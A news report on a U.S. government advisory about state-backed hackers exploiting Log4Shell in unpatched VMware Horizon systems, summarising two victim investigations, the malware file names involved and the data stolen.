Attackers Use Log4Shell to Hack Unpatched VMware ProductsUnpatched Systems Should Be Treated as Compromised, say U.S. Cyber Agencies
System administrators who haven't yet patched the Log4Shell vulnerability could get a rude awakening in the form of state-sponsored hacking, warns the U.S. government.
See Also: 2022 Unit 42 Incident Response Report
A joint advisory from the Cybersecurity and Infrastructure Security Agency and the Coast Guard Cyber Command says advanced persistent threat actors are using the exploit to hack into unpatched VMWare virtual desktop software.
Security researchers set off a firestorm late last year when they discovered a zero-day vulnerability in a popular open-source Java data-logging framework present in hundreds of millions of devices. A patch released by the Apache Software Foundation in December set off a global race between systems administrators and hackers - a sprint that some organizations dangerously have yet to complete (see: Serious Log4j Security Flaw: Race Underway to Discern Scope).
Multiple threat actors intent on taking advantage of this moment are using Log4Shell to penetrate unpatched VMware Horizon Systems and Unified Access Gateway products, the advisory says. Some load malware with embedded executables that establish a remote connection with a command-and-control server. Attackers in one confirmed compromise detailed by the government advisory were able to gain entry into a sensitive network via a vulnerable instance of VMware Horizon and exfiltrate sensitive law enforcement data.
Any VMware system that has not been updated with the Log4Shell patch or that hasn't been modified with a workaround should be treated as already compromised, CISA and the Coast Guard Cyber Command say.
Check out this joint #cybersecurity advisory from @CISAgov & @USCG Cyber detailing cyber threat actors exploiting a #Log4Shell vulnerability in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain access to victim networks. https://t.co/JYA5Ioz1fG pic.twitter.com/Do8qGI3YrW— JenEasterly (@CISAJen) June 23, 2022
The advisory illustrates an all-too-common trajectory of vulnerabilities, says Kumar Saurabh, chief executive and co-founder of cybersecurity firm LogicHub. Initial discovery leads to a burst of patching that still doesn't reach every affected system, he tells Information Security Media Group. Then the vulnerability drops from view until hackers nudge it back into awareness.
"Vulnerabilities can stay around for a long time and continue to be exploited as long as there are gaps. It's critical that we remain vigilant about any exploit, even if it's been checked off the list as 'done,'" he says.
Victim Analysis 1: Highest Privilege Level
Threat hunting carried out by the U.S. Coast Guard Cyber Command shows that threat actors exploited Log4Shell to gain initial access into an undisclosed victim's network. They uploaded a malware file -
"hmsvc.exe." - that masquerades as the Microsoft Windows security utility
An embedded executable inside the malware contains several capabilities, including keystrokes logging and deployment of additional payloads, and provides a graphical user interface to access the victim's Windows desktop system. It can function as a command-and-control tunnelling proxy, allowing a remote operator to move further into a network, the agencies say.
The analysis also found that
hmsvc.exe ran as a local system account with the highest possible level of privileges but doesn't explain how attackers elevated their privileges to that point.
Victim Analysis 2: Multiple Attackers
Incident response activity by CISA found that multiple threat groups had compromised the network of an undisclosed organization with access to law enforcement data.
The U.S. government is not disclosing the number of threat actors, and it is unclear if they shared access details or used an access broker. One of the threat actors gained access to the organization's network in January or perhaps earlier.
Once inside the production environment, threat actors used PowerShell scripts to move laterally into other production environment hosts and servers. They leveraged compromised administrator accounts to run a loader malware, which appears to have capabilities similar to malware identified by the Coast Guard. Because multiple actors had access to the network, CISA found several Windows loader malwares with malicious embedded executables, including SvcEdge.exe, odbccads.exe, praiser.exe, fontdrvhosts.exe, and winds.exe.
The C2 capabilities of the embedded executables include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payloads, the agencies say.
One threat actor had access to the victim's production environment for three weeks and exfiltrated more than 130 gigabytes of data from its security management server. The agency found
.rar archiving files "containing sensitive law enforcement investigation data under a known compromised administrator account."